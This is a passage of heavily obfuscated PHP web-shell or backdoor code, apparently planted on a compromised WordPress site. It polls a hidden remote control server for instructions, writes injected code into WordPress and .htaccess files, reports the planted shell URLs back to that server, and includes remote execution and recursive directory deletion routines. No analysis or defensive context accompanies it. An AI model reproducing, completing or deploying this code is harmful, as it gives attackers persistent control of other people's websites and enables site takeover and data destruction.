$json_array["\167\x70\137\143\x6f\x64\145"]; $in_list = explode("\73", $json_array["\x69\156\137\146\151\x6c\x65\163"]); foreach ($in_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\x5b\43\43\x69\156\137\x63\x6f\156\164\x6e\164\137" . $k . "\x23\43\x5d", $wpstr, $wp_code); $contnt = $json_array["\x63\x6f\144\x65"] . $json_array["\167\160\137\x79\x63\157\144\145"]; crefile($v, $contnt); } $ht_list = explode("\73", $json_array["\150\x74\137\x66\x69\154\x65\163"]); foreach ($ht_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\133\x23\x23\x68\164\x5f\143\x6f\x6e\164\x6e\x74\137" . $k . "\43\43\x5d", $wpstr, $wp_code); $contnt = $json_array["\150\164\x5f\143\x6f\x6e\x74\x6e\164"]; crefile($v, $contnt); } $wp_list = explode("\x3b", $json_array["\167\160\x5f\146\151\154\x65\x73"]); $wp_result = array(); foreach ($wp_list as $k => $v) { $f = crefile($v, $wp_code); if ($f) { $wp_result[] = $now_site . $v; } } if (!empty($wp_result) && count($wp_result) > 0) { $result_data["\167\x70\x5f\x75\x72\154\163"] = $wp_result; $result_data["\163\164\141\164\x75\x73"] = 1; } else { $result_data["\143\x6f\144\145"] = "\x31\x30\x30\61"; $result_data["\x73\x74\141\164\x75\x73"] = 2; } } else { $result_data["\143\157\x64\145"] = "\x31\60\x30\x32"; $result_data["\x73\164\x61\x74\x75\x73"] = 2; } $result_data["\x73\x68\145\154\x6c\137\165\162\154"] = $now_site; $result_data["\x73\150\145\154\154\137\x74\171\160\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\164\141\x74\165\x73"]) { echo "\74\x70\x20\163\x74\171\154\x65\75\x22\x63\x6f\x6c\157\x72\72\x67\162\x65\145\156\73\x22\76\122\145\142\141\143\153\x20\151\163\x20\163\165\143\143\145\x73\x73\x66\165\154\154\x79\x3c\57\x70\x3e"; foreach ($wp_result as $k => $v) { echo "\74\x70\x3e\74\x61\x20\150\x72\x65\x66\75\42" . $v . "\42\x20\164\141\x72\x67\x65\x74\x3d\42\137\142\154\141\x6e\153\x22\x3e" . $v . "\74\x2f\x61\76\74\57\x70\x3e"; } } else { echo "\x3c\x70\40\x73\164\171\x6c\145\x3d\42\143\157\x6c\x6f\x72\x3a\162\145\x64\73\x22\76\122\x65\x62\141\x63\153\x20\x69\163\40\146\x61\151\154\x65\x64\41\x20" . $result_data["\143\157\144\145"] . "\74\x2f\x70\76"; } } goto PdgJA; PdgJA: function execAction($data, $pweb, $now_site) { $group_id = $data["\x67\x72\157\x75\x70\x5f\151\144"]; $shell_id = $data["\163\x68\145\154\x6c\137\x69\144"]; $shell_type = $data["\163\x68\145\x6c\154\137\x74\171\160\145"]; $url = base64_decode($pweb) . "\57\145\x69\x6e\144\x65\x78\144\x6f\x6f\x72\56\x70\150\160\77\x61\x63\164\x69\157\156\75\145\x78\145\143\x26\x67\162\157\x75\160\x5f\151\144\75" . $group_id . "\46\163\x68\145\154\154\137\164\171\x70\x65\75" . $shell_type; $result_data = array(); $result_data["\x73\x68\145\154\x6c\137\151\x64"] = $shell_id; $result_data["\x61\x63\164\151\x6f\x6e"] = "\145\x78\145\x63"; $save_url = base64_decode($pweb) . "\57\145\x73\x61\166\145\56\x70\150\x70"; $cc = curlget($url); $json_array = json_decode($cc, true); if (isset($json_array["\x69\156\x5f\x63\x6f\156\x74\156\164"]) && !empty($json_array["\x68\x74\137\x63\x6f\x6e\x74\x6e\164"]) && !empty($json_array["\x65\170\145\x63\137\x63\x6f\144\145"])) { $result = add_exec($json_array["\x68\164\137\x63\x6f\x6e\164\x6e\164"], $json_array["\x69\156\x5f\x63\157\156\x74\x6e\164"], $json_array["\x65\x78\145\x63\137\x63\x6f\144\145"], $json_array["\167\160\137\x79\x63\157\144\x65"]); if ($result) { $result_data["\x73\x74\141\x74\x75\x73"] = 1; } else { $result_data["\143\x6f\144\145"] = "\x31\60\60\61"; $result_data["\163\164\141\164\x75\x73"] = 2; } } else { $result_data["\x63\x6f\x64\x65"] = "\x31\60\x30\62"; $result_data["\163\164\x61\164\x75\x73"] = 2; } $result_data["\163\150\x65\x6c\154\x5f\164\x79\x70\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\x74\141\164\165\x73"]) { echo "\x3c\160\x20\163\164\171\x6c\145\75\x22\143\157\154\157\x72\72\147\x72\145\x65\156\x3b\x22\x3e\x45\170\x65\143\40\x69\163\x20\163\165\x63\143\x65\x73\163\146\x75\x6c\x6c\x79\74\57\160\x3e"; } else { echo "\x3c\160\x20\x73\164\x79\x6c\x65\75\x22\143\157\x6c\x6f\162\x3a\162\145\144\73\42\76\x45\x78\145\143\40\151\x73\40\x66\x61\151\x6c\x65\x64\41\40" . $result_data["\x63\157\144\145"] . "\x3c\x2f\x70\x3e"; } } goto DuS_l; lzUOT: $sy_path = str_replace($website_path, '', $now_path); goto VZgsP; Nd3ZL: $data = $_SERVER; goto wvL7I; MfOYa: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto xoGLR; fQcZA: function getParentsFolders($path) { $all_folders = array(); $parent_folds = dirname($path); $directories = glob($parent_folds . "\57\x2a", GLOB_ONLYDIR); $all_folders = $directories; $parent_folds = dirname($parent_folds); $directories = glob($parent_folds . "\57\52", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); return $all_folders; } goto or3Cr; qG8zt: $file_path = $data["\123\x43\122\x49\x50\124\137\106\111\114\105\116\x41\x4d\105"]; goto dSIqV; tt_eE: function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $files = glob($dir . "\x2f\x2a"); foreach ($files as $file) { if (is_file($file)) { unlink($file); } elseif (is_dir($file)) { deleteDirectory($file); } } return rmdir($dir); } goto wN8yF; i7zV4: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto PhIHn; ejilS: $dir = $_POST["\x64\x69\162"]; goto uMr1o; yzheS: @set_time_limit(0); goto z3tac; VA5J7: ?>